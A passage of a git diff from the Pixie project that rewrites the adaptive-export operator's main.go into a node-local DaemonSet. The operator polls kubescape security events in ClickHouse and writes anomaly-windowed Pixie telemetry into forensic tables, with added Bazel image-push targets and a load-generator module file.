a/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod new file mode 100644 index 00000000000..4ad12205416 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/tools/loadgen/go.mod @@ -0,0 +1,5 @@ +module aeload + +go 1.22 + +require github.com/lib/pq v1.10.9 diff --git a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel index bcb150a2802..38fa4950c16 100644 --- a/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel +++ b/src/stirling/source_connectors/socket_tracer/testing/container_images/BUILD.bazel @@ -24,29 +24,29 @@ package(default_visibility = [ # Generate all Go container library permutations for supported Go versions. go_container_libraries( - container_type = "grpc_server", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "grpc_server", prebuilt_container_versions = pl_go_test_versions, ) # Stirling test cases usually test server side tracing. Therefore # we only need to provide the bazel SDK versions for the client containers. go_container_libraries( - container_type = "grpc_client", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "grpc_client", ) go_container_libraries( - container_type = "tls_server", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "tls_server", prebuilt_container_versions = pl_go_test_versions, ) # Stirling test cases usually test server side tracing. Therefore # we only need to provide the bazel SDK versions for the client containers. go_container_libraries( - container_type = "tls_client", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "tls_client", ) pl_cc_test_library( diff --git a/src/vizier/services/adaptive_export/BUILD.bazel b/src/vizier/services/adaptive_export/BUILD.bazel index 38773121091..b352fa213f6 100644 --- a/src/vizier/services/adaptive_export/BUILD.bazel +++ b/src/vizier/services/adaptive_export/BUILD.bazel @@ -14,6 +14,8 @@ # # SPDX-License-Identifier: Apache-2.0 +load("@io_bazel_rules_docker//container:container.bzl", "container_bundle") +load("@io_bazel_rules_docker//contrib:push-all.bzl", "container_push") load("//bazel:pl_build_system.bzl", "pl_go_image") pl_go_image( @@ -24,3 +26,27 @@ pl_go_image( "//src/vizier:__subpackages__", ], ) + +# Single-image bundle + push targets — same shape as +# //k8s/vizier:image_bundle / vizier_images_push, but scoped to ONLY +# the adaptive_export image so the SBOB PoC can rebuild this one +# component without rebuilding kelvin / pem / metadata. Consumed by +# .github/workflows/adaptive_export_image.yaml via +# `bazel run :adaptive_export_image_push` with the standard +# --//k8s:image_repository / --//k8s:image_version overrides. +container_bundle( + name = "adaptive_export_image_bundle", + images = { + "$(IMAGE_PREFIX)/vizier-adaptive_export_image:$(BUNDLE_VERSION)": ":adaptive_export_image", + }, + toolchains = [ + "//k8s:image_prefix", + "//k8s:bundle_version", + ], +) + +container_push( + name = "adaptive_export_image_push", + bundle = ":adaptive_export_image_bundle", + format = "Docker", +) diff --git a/src/vizier/services/adaptive_export/cmd/BUILD.bazel b/src/vizier/services/adaptive_export/cmd/BUILD.bazel index e5cc4fe7423..1ebaf3c27cd 100644 --- a/src/vizier/services/adaptive_export/cmd/BUILD.bazel +++ b/src/vizier/services/adaptive_export/cmd/BUILD.bazel @@ -24,10 +24,21 @@ go_library( visibility = ["//visibility:private"], deps = [ "//src/api/go/pxapi", + "//src/shared/services", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/clickhouse", "//src/vizier/services/adaptive_export/internal/config", + "//src/vizier/services/adaptive_export/internal/control", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/passthrough", "//src/vizier/services/adaptive_export/internal/pixie", + "//src/vizier/services/adaptive_export/internal/pixieapi", "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", "//src/vizier/services/adaptive_export/internal/script", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/streaming", + "//src/vizier/services/adaptive_export/internal/trigger", "@com_github_sirupsen_logrus//:logrus", ], ) diff --git a/src/vizier/services/adaptive_export/cmd/main.go b/src/vizier/services/adaptive_export/cmd/main.go index 10d178f6b3f..7cb5ae6d1ee 100644 --- a/src/vizier/services/adaptive_export/cmd/main.go +++ b/src/vizier/services/adaptive_export/cmd/main.go @@ -14,394 +14,876 @@ // // SPDX-License-Identifier: Apache-2.0 +// Adaptive-export operator (push flow, design rev 2). +// +// Lifecycle (one pod per node, deployed as a DaemonSet): +// +// 1. boot: +// - load config (env + k8s downward API for NODE_NAME) +// - ensure ClickHouse retention plugin is enabled (idempotent; +// retention scripts themselves are user-defined in the Pixie UI) +// - rehydrate the in-memory active set from +// forensic_db.adaptive_attribution FINAL WHERE hostname= +// - start the trigger + controller +// +// 2. steady state: +// - trigger polls forensic_db.kubescape_logs WHERE hostname= +// - controller derives anomaly hash from each event and writes a +// forensic_db.adaptive_attribution row (one INSERT per event; +// ReplacingMergeTree(t_end) collapses re-inserts to the latest +// end_time, extending the active window) +// +// 3. shutdown: +// - on SIGINT/SIGTERM, cancel context, drain. package main import ( "context" "fmt" + "net/http" + _ "net/http/pprof" // /debug/pprof/* on the debug-only listener (gated by AE_PPROF_ADDR; not in release builds otherwise unused) "os" "os/signal" + "strconv" "strings" + "sync" "syscall" "time" log "github.com/sirupsen/logrus" "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/shared/services" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" "px.dev/pixie/src/vizier/services/adaptive_export/internal/config" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/control" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" ) const ( - defaultRetries = 100 - defaultSleepTime = 15 * time.Second - schemaCreationInterval = 2 * time.Minute - setupTimeout = 30 * time.Second - scriptExecutionTimeout = 60 * time.Second -) - -const ( - schemaCreationScriptTmpl = ` -import px -px.display(px.CreateClickHouseSchemas( - host="%s", - port=%s, - username="%s", - password="%s", - database="%s" -)) -` - detectionScriptTmpl = ` -import px - -df = px.DataFrame('%s', clickhouse_dsn='%s', start_time='-%ds') -df.alert = df.message -df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace") -df.podName = px.pluck(df.RuntimeK8sDetails, "podName") -df.time_ = px.int64_to_time(df.event_time * 1000000000) -df = df[['time_', 'alert', 'namespace', 'podName']] -px.display(df) -` + // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by + // both the trigger (poll kubescape_logs) and the sink (write + // adaptive_attribution). Defaults to http://:8123. + envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT" + + // envNodeName is the k8s downward API var the DaemonSet sets via + // `valueFrom: fieldRef: spec.nodeName`. Falls back to os.Hostname(). + envNodeName = "NODE_NAME" + + // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS / + // envPruneIntervalSec are programmatic overrides per the spec. + envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC" + envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC" + envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS" + envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC" + + // envPushRefreshSec overrides controller.PushRefreshInterval. Unset → + // 30s default. A NEGATIVE value selects single-shot mode (one pull per + // anomaly window), which the load-test harness uses so the non-deduping + // MergeTree protocol tables get each window exactly once. + envPushRefreshSec = "ADAPTIVE_PUSH_REFRESH_SEC" + + // envTriggerHTTPTimeoutSec — per-poll HTTP budget (default 30s). + // The pre-watermark 5s default timed out every catch-up SELECT. + envTriggerHTTPTimeoutSec = "ADAPTIVE_TRIGGER_HTTP_TIMEOUT_SEC" + + // envTriggerPollLimit — max rows fetched per poll (default 10000). + // Bounds catch-up work after a restart so an N-hour backlog + // drains in ceil(N/PollLimit) polls instead of one giant scan. + envTriggerPollLimit = "ADAPTIVE_TRIGGER_POLL_LIMIT" + + // envWatermarkSaveSec — minimum interval between persistent + // watermark INSERTs (default 5s). The in-memory watermark + // advances every successful poll; flush is throttled. + envWatermarkSaveSec = "ADAPTIVE_WATERMARK_SAVE_SEC" + + // envSkipApply lets a deployment opt out of in-process DDL when + // the schema has been pre-applied by a separate Job (recommended + // production split: high-priv Job for CREATE TABLE / ALTER, then + // the operator runs with INSERT-only creds and skips Apply). + // VerifyPixieSchema still runs and refuses to start on drift. + envSkipApply = "ADAPTIVE_SKIP_APPLY" + + // envInstallPresets makes the operator boot install Pixie's preset + // retention scripts on this cluster. One-shot, idempotent (script-name + // match → skip). Defaults to false because the production design has + // users author scripts in the Pixie UI. + envInstallPresets = "INSTALL_PRESET_SCRIPTS" + + // === Throughput-protection knobs for the pushPixieRows fan-out. + // All default to 0 (= legacy unbounded behavior preserved). + envMaxParallelQueriesPerHash = "ADAPTIVE_MAX_PARALLEL_QUERIES_PER_HASH" + envMaxInflightQueriesGlobal = "ADAPTIVE_MAX_INFLIGHT_QUERIES_GLOBAL" + envEmptyResultSkipAfterN = "ADAPTIVE_EMPTY_RESULT_SKIP_AFTER_N" + envEmptyResultSkipTTLSec = "ADAPTIVE_EMPTY_RESULT_SKIP_TTL_SEC" + + // envPushPixieTables — when true, the operator queries vizier + // directly via pxapi on each fresh anomaly and writes the resulting + // rows to forensic_db.
(rev-1 path). Required when the + // cloud's retention plugin can't reach the in-cluster CH (e.g. + // AOCC pixie cloud + CH ClusterIP service). + envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS" + + // envAdaptiveWriteMode selects the protocol-table write path: + // "pull" → rev-2: per-hash×per-table fan-out (default) + // "streaming" → rev-3: N TableScanners with shared allowlist + // (see .local/adaptive-write-rev3-plan.md) + envAdaptiveWriteMode = "ADAPTIVE_WRITE_MODE" + + // envPassthrough — firehose mode counterpart to the anomaly-gated + // path. When "true", a single background loop queries every pixie + // observation table with an empty Target (no ns/pod predicate), + // over the rolling window, and writes the result via the existing + // sink. Enables A/B measurement of AE's capture fraction by + // running the same workload+window twice with the env flipped. + envPassthrough = "ADAPTIVE_PASSTHROUGH" + envPassthroughWindow = "ADAPTIVE_PASSTHROUGH_WINDOW_SEC" + envPassthroughRefresh = "ADAPTIVE_PASSTHROUGH_REFRESH_SEC" + // envPassthroughCompiled — selects the firehose query path. Default + // ON: per-table PxL is precompiled once and all tables are pulled + // concurrently per tick. Set to "false" to revert to the legacy path + // (QueryFor rebuilt per tick, tables walked serially). + envPassthroughCompiled = "ADAPTIVE_PASSTHROUGH_COMPILED" + + // envReconcile — per-pull write-fidelity instrument. When "true", + // every data-plane pull (filter / passthrough / streaming) records + // one forensic_db.ae_reconcile row (read_count vs wrote_count, window, + // pod) so a reconcile run can localize loss to query (R5) vs sink (R6). + // Off by default; the recorder is reconcile.Nop{} unless set. + envReconcile = "ADAPTIVE_RECONCILE" ) -func renderSchemaScript(cfg config.ClickHouse) string { - return fmt.Sprintf(schemaCreationScriptTmpl, - cfg.Host(), cfg.Port(), cfg.User(), cfg.Password(), cfg.Database()) -} - -func renderDetectionScript(cfg config.ClickHouse, lookback int64) string { - return fmt.Sprintf(detectionScriptTmpl, cfg.Table(), cfg.DSN(), lookback) -} - func main() { + // Wire AE into the shared pixie service scaffold: + // - SetupService registers --version + ports. + // - SetupSSLClientFlags adds the client TLS flags pxapi uses + // when --disable_ssl=false (cluster TLS into vizier). + // - PostFlagSetupAndParse runs pflag.Parse and binds viper to + // PL_*-prefixed env vars (so PL_JWT_SIGNING_KEY etc. work + // without any custom os.Getenv plumbing). + // - SetupServiceLogging switches logrus to JSON for log shippers. + // AE doesn't run a gRPC server, so CheckServiceFlags is skipped — + // it panics on missing --server_tls_key/cert which AE has no use + // for. + services.SetupService("adaptive-export", 50900) + services.SetupSSLClientFlags() + services.PostFlagSetupAndParse() + services.SetupServiceLogging() + ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log.Info("Starting the ClickHouse Adaptive Export service") + // Debug pprof listener — gated on AE_PPROF_ADDR (e.g. "127.0.0.1:6060"). + // Off by default; when set, /debug/pprof/* on that addr exposes the + // runtime profiles for live CPU / heap / goroutine investigations. The + // blank-import of net/http/pprof above registers the handlers on the + // DefaultServeMux. Bind loopback in containers unless you port-forward. + if addr := os.Getenv("AE_PPROF_ADDR"); addr != "" { + go func() { + log.WithField("addr", addr).Info("pprof listening (/debug/pprof/*)") + if err := http.ListenAndServe(addr, nil); err != nil && + err != http.ErrServerClosed { + log.WithError(err).Error("pprof listener stopped") + } + }() + } + + log.Info("starting adaptive-export operator (push flow, rev 2)") cfg, err := config.GetConfig() if err != nil { log.WithError(err).Fatal("failed to load configuration") } - clusterID := cfg.Pixie().ClusterID() - clusterName := cfg.Worker().ClusterName() - - // Setup Pixie Plugin API client - log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterID) - pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime) + hostname, err := resolveHostname() if err != nil { - log.WithError(err).Fatal("setting up Pixie plugin client failed") + log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)") } + log.WithField("hostname", hostname).Info("operator pod is node-local") + + chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint)) + log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved") - // Setup Pixie pxapi client for executing PxL scripts - log.Info("Setting up Pixie pxapi client") - // Use parent context - client stores this and uses it for all subsequent operations - pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host())) + // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin + // has a chance to auto-create pixie tables with its minimal + // column set (no namespace / pod). The kubescape tables + // (alerts, kubescape_logs) are owned by the soc installer and + // are NOT touched here. + applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password()) if err != nil { - log.WithError(err).Fatal("failed to create pxapi client") - } - - // Start schema creation background task. This drives - // px.CreateClickHouseSchemas, which issues CREATE TABLE IF NOT EXISTS - // for every Pixie stirling table the metadata service knows about. In - // labs where ClickHouse users don't have DDL rights (e.g. soc's - // ingest_writer with allow_ddl=0), the CREATE silently fails and only - // tables pre-created by external schema.sql work. Off by default to - // avoid noisy server logs; opt-in via env when you want Pixie's - // automatic schema bootstrap. - if strings.EqualFold(os.Getenv("ENABLE_SCHEMA_CREATION"), "true") { - log.Info("ENABLE_SCHEMA_CREATION=true — starting schema creation task") - go runSchemaCreationTask(ctx, pxClient, clusterID, cfg.ClickHouse()) + log.WithError(err).Fatal("failed to construct schema applier") + } + if strings.EqualFold(os.Getenv(envSkipApply), "true") { + log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables") } else { - log.Info("Schema creation task disabled (set ENABLE_SCHEMA_CREATION=true to opt in)") + if err := applier.Apply(ctx); err != nil { + log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables") + } + log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied") } - // Start detection + reconcile loop that turns the retention plugin on/off - go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterID, clusterName) - - // Wait for signal to shutdown - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - <-sigCh - - log.Info("Shutting down adaptive export service") - cancel() - time.Sleep(1 * time.Second) -} + // 2. Defensive guard against Pixie's retention plugin having + // auto-created any pixie table BEFORE our Apply ran (e.g. a + // pre-existing cluster install). Refuse to start if drift + // detected so the misconfig is loud, not silent. + if err := applier.VerifyPixieSchema(ctx); err != nil { + log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying") + } + log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables") + + // 3. Best-effort: ensure the Pixie ClickHouse retention plugin is + // enabled. The retention scripts themselves are defined by the + // user via the Pixie UI — we don't manage them. The cloud client + // is OPTIONAL — direct-mode query (set up in step 5) does not + // need it, so a cloud-side outage must not block the operator + // from starting. Downgrade the failure to a warning and skip the + // plugin/preset steps that depend on this client. + pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host()) + if err != nil { + log.WithError(err).Warn("could not create pixie cloud plugin client — skipping plugin enablement and preset install; pixie tables will stay empty until the user enables the plugin in the Pixie UI") + pluginClient = nil + } + if pluginClient != nil { + chDSN := cfg.ClickHouse().DSN() + exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN) + if err != nil { + // non-fatal — the operator's own write path doesn't depend on + // the plugin; analyst joins against pixie-table rows do, but a + // missing plugin is a deployment misconfiguration the user + // surfaces via UI. + log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI") + } else { + log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled") + } -func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string, chCfg config.ClickHouse) { - ticker := time.NewTicker(schemaCreationInterval) - defer ticker.Stop() - - runOnce := func() { - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - defer cancel() - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, renderSchemaScript(chCfg)); err != nil { - log.WithError(err).Error("failed to execute schema creation script") - return + // 3b. (optional) install Pixie's preset retention scripts so the + // pixie observation tables actually receive rows. Without this, + // the plugin is enabled but does nothing. + if strings.EqualFold(os.Getenv(envInstallPresets), "true") { + installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName()) + if err != nil { + log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty") + } else { + log.WithField("installed", installed).Info("preset retention scripts installed on cluster") + } } - log.Info("Schema creation script completed successfully") } - runOnce() - for { - select { - case <-ctx.Done(): - log.Info("Schema creation task shutting down") - return - case <-ticker.C: - runOnce() - } + // 4. Build trigger + sink + controller. + pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond) + httpTimeout := durEnv(envTriggerHTTPTimeoutSec, 30*time.Second, time.Second) + saveInterval := durEnv(envWatermarkSaveSec, 5*time.Second, time.Second) + pollLimit := intEnv(envTriggerPollLimit, 10000) + // Persistent watermark store keeps the trigger's kubescape_logs + // cursor in forensic_db.trigger_watermark, so a restart on a busy + // node doesn't replay the full table from event_time=0 (which + // timed out every single HTTP read and pinned the watermark at 0 + // forever — the failure mode that produced "AE silent for 10h + // after OOM-restart" in the field). + wmStore, err := trigger.NewClickHouseWatermarkStore( + chEndpoint, cfg.ClickHouse().Database(), + cfg.ClickHouse().User(), cfg.ClickHouse().Password(), + httpTimeout) + if err != nil { + log.WithError(err).Fatal("failed to create persistent watermark store") + } + trg, err := trigger.New(trigger.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Table: cfg.ClickHouse().Table(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + Hostname: hostname, + PollInterval: pollInterval, + Watermark: wmStore, + WatermarkSaveInterval: saveInterval, + PollLimit: pollLimit, + HTTPTimeout: httpTimeout, + }) + if err != nil { + log.WithError(err).Fatal("failed to create trigger") + } + + snk, err := sink.New(sink.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + }) + if err != nil { + log.WithError(err).Fatal("failed to create sink") } -} -func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) { - detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second - detectionLookback := cfg.Worker().DetectionLookback() - quietTicks := cfg.Worker().ExportQuietTicks() - mode := cfg.Worker().ExportMode() + // Per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). When on, + // the CH-backed sink IS the Recorder; otherwise a Nop drops every row. + // Shared by the controller fan-out, passthrough, and streaming paths. + var rec reconcile.Recorder = reconcile.Nop{} + if strings.EqualFold(os.Getenv(envReconcile), "true") { + rec = snk + log.Info("ADAPTIVE_RECONCILE=true — per-pull read/wrote counts → forensic_db.ae_reconcile") + } - ticker := time.NewTicker(detectionInterval) - defer ticker.Stop() + // Mode selection: + // "streaming" → rev-3: leave PushPixieTables EMPTY (so the + // controller skips fan-out) and stand up the + // streaming.Supervisor instead. + // else → rev-2: per-hash×per-table fan-out (legacy). + streamingMode := strings.EqualFold(os.Getenv(envAdaptiveWriteMode), "streaming") + pushPixieRequested := strings.EqualFold(os.Getenv(envPushPixieTables), "true") + if streamingMode && pushPixieRequested { + log.Info("ADAPTIVE_WRITE_MODE=streaming overrides ADAPTIVE_PUSH_PIXIE_ROWS — fan-out disabled, streaming.Supervisor will own protocol-table writes") + } - // pluginEnabled tracks our last-known retention-plugin state. A nil value means - // we haven't reconciled yet; we always query on the first tick. - var pluginEnabled *bool - quietStreak := int64(0) + // Shared ActiveSet (used only by streaming mode; harmless in pull mode). + activeSet := activeset.New() + // AttributionNotifier — non-blocking shim so the controller's + // synchronous OnAttribution / OnPrune callbacks don't pin + // controller.handle on slow ActiveSet writes. Tests in + // streaming/notifier_test.go cover the buffer-overflow + drop + // semantics. The Run goroutine is started below in streaming mode. + attrNotifier := streaming.NewAttributionNotifier(activeSet, streaming.NotifierConfig{ + BufferSize: intEnvOrZero("ADAPTIVE_STREAM_NOTIFIER_BUFFER"), + }) - reconcile := func(want bool) { - if pluginEnabled != nil && *pluginEnabled == want { - log.Debugf("export already in desired state (enabled=%v), no action taken", want) - return + ctlCfg := controller.Config{ + Hostname: hostname, + Rec: rec, + Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second), + After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second), + MaxParallelQueriesPerHash: intEnvOrZero(envMaxParallelQueriesPerHash), + MaxInflightQueriesGlobal: intEnvOrZero(envMaxInflightQueriesGlobal), + EmptyResultSkipAfterN: intEnvOrZero(envEmptyResultSkipAfterN), + EmptyResultSkipTTL: durEnvOrZero(envEmptyResultSkipTTLSec, time.Second), + } + if streamingMode { + // Route through the non-blocking notifier — handle() returns + // in <1µs even if ActiveSet writers are slow. Host-pid pods + // (empty Pod) are filtered inside the notifier. + ctlCfg.OnAttribution = attrNotifier.SubmitFromController + ctlCfg.OnPrune = attrNotifier.RemoveFromController + } + if !streamingMode && pushPixieRequested { + // PxL's px.DataFrame(table=…) rejects dotted table names even + // though px.GetSchemas() lists them. Drop them from the push + // list; the cloud-side retention plugin would have to handle + // those if the user wants them. + var tables []string + for _, t := range pxl.Names(pxl.Builtins()) { + if strings.Contains(t, ".") { + log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it") + continue + } + tables = append(tables, t) } - pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute) - defer pluginCancel() - if want { - log.Info("Enabling forensic export") - if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to enable forensic export") - return + ctlCfg.PushPixieTables = tables + log.WithField("tables", ctlCfg.PushPixieTables). + Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly") + } + // Optional single-shot / custom refresh override (default-unchanged when + // unset). Negative → single-shot: exactly one pull per anomaly window. + if v := strings.TrimSpace(os.Getenv(envPushRefreshSec)); v != "" { + if n, err := strconv.Atoi(v); err == nil { + if n < 0 { + ctlCfg.PushRefreshInterval = -1 + log.Info(envPushRefreshSec + "<0 — single-shot pull mode (one pull per anomaly window)") + } else { + ctlCfg.PushRefreshInterval = time.Duration(n) * time.Second } - v := true - pluginEnabled = &v - log.Info("Forensic export enabled successfully") } else { - log.Info("Disabling forensic export") - if err := disableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to disable forensic export") - return - } - v := false - pluginEnabled = &v - quietStreak = 0 - log.Info("Forensic export disabled successfully") + log.WithField("value", v).Warn(envPushRefreshSec + " not an integer; using default refresh") } } - - log.Infof("Detection task starting (mode=%s, quietTicks=%d)", mode, quietTicks) - - for { - select { - case <-ctx.Done(): - log.Info("Detection task shutting down") - return - case <-ticker.C: - switch mode { - case config.ExportModeAlways: - reconcile(true) - continue - case config.ExportModeNever: - reconcile(false) - continue + ctl := controller.New(trg, snk, ctlCfg, nil) + + // Build the pixie adapter ONCE — shared by rev-2's pushPixieRows + // path, the rev-3 streaming.Supervisor, AND the firehose passthrough + // loop. All three need a live pxapi client; constructing once avoids + // holding two parallel grpc streams for the same vizier. + passthroughEnabled := strings.EqualFold(os.Getenv(envPassthrough), "true") + var pixieAdapterInst *pixieapi.Adapter + if len(ctlCfg.PushPixieTables) > 0 || streamingMode || passthroughEnabled { + var adapter *pixieapi.Adapter + if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" { + // Direct mode — bypass the cloud's passthrough proxy and + // connect to the in-cluster vizier-query-broker. Use this + // on self-hosted clouds where pxapi.WithAPIKey isn't + // authorized for the cluster (e.g. a freshly-deployed + // vizier whose ID isn't yet linked to the API key's owner). + a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID()) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed") } - - // auto mode: detection drives the state. - log.Debug("Running detection script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, renderDetectionScript(cfg.ClickHouse(), detectionLookback)) - cancel() + log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)") + adapter = a + } else { + pxClient, err := pxapi.NewClient(ctx, + pxapi.WithAPIKey(cfg.Pixie().APIKey()), + pxapi.WithCloudAddr(cfg.Pixie().Host())) if err != nil { - log.WithError(err).Error("failed to execute detection script") - continue + log.WithError(err).Fatal("failed to create pxapi client") } - log.Debugf("Detection script returned %d records", recordCount) + adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID()) + } + pixieAdapterInst = adapter + if len(ctlCfg.PushPixieTables) > 0 { + ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter}) + } + } - if recordCount > 0 { - quietStreak = 0 - reconcile(true) - } else { - quietStreak++ - if quietStreak >= quietTicks { - reconcile(false) + // 5. Rehydrate active state across crashes. + if err := ctl.Rehydrate(ctx); err != nil { + log.WithError(err).Warn("could not rehydrate active set; starting cold") + } else { + log.WithField("active", ctl.Active()).Info("active set rehydrated") + } + + // 6. Periodic prune of in-memory expired entries + main controller loop. + // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits + // for in-flight HTTP calls (trigger 5s timeout, sink 30s timeout) + // instead of being cut off by an arbitrary 500ms sleep. + pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second) + var wg sync.WaitGroup + wg.Add(1) + go func() { + defer wg.Done() + t := time.NewTicker(pruneInterval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-t.C: + if removed := ctl.PruneExpired(); removed > 0 { + log.WithField("removed", removed).Debug("pruned expired active entries") } } } + }() + + // 7. Run the controller. + wg.Add(1) + go func() { + defer wg.Done() + if err := ctl.Run(ctx); err != nil && err != context.Canceled { + log.WithError(err).Error("controller exited with error") + } + }() + + // 7b. Streaming mode (rev-3): start the per-table scanners + + // batched writers. Replaces the per-hash×per-table fan-out. + if streamingMode { + // Start the AttributionNotifier consumer so SubmitFromController + // calls actually get delivered to ActiveSet. + wg.Add(1) + go func() { + defer wg.Done() + attrNotifier.Run(ctx) + }() + + // Seed the ActiveSet from the rehydrated controller so existing + // alive attribution rows resume streaming immediately on boot. + // Without this seeding, only fresh kubescape events would + // repopulate the set — losing N minutes of coverage per restart. + seedActiveSetFromRehydrate(ctl, activeSet) + + builtins := pxl.Builtins() + streamTables := make([]string, 0, len(builtins)) + for _, t := range pxl.Names(builtins) { + if strings.Contains(t, ".") { + continue // PxL DataFrame rejects dotted names + } + streamTables = append(streamTables, t) + } + updater := streaming.NewUpdater(activeSet, streaming.UpdaterConfig{ + Debounce: durEnvOrZero("ADAPTIVE_STREAM_DEBOUNCE_SEC", time.Second), + MaxAllowlistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_ALLOWLIST"), + }) + supervisor := streaming.NewSupervisor( + updater, + &pixieAdapter{a: pixieAdapterInst}, + snk, + streamTables, + streaming.ScannerConfig{ + QueryWindow: durEnvOrZero("ADAPTIVE_STREAM_WINDOW_SEC", time.Second), + RefreshInterval: durEnvOrZero("ADAPTIVE_STREAM_REFRESH_SEC", time.Second), + Rec: rec, + Hostname: hostname, + }, + streaming.WriterConfig{ + BatchRows: intEnvOrZero("ADAPTIVE_STREAM_BATCH_ROWS"), + BatchEvery: durEnvOrZero("ADAPTIVE_STREAM_BATCH_EVERY_SEC", time.Second), + }, + ) + wg.Add(1) + go func() { + defer wg.Done() + 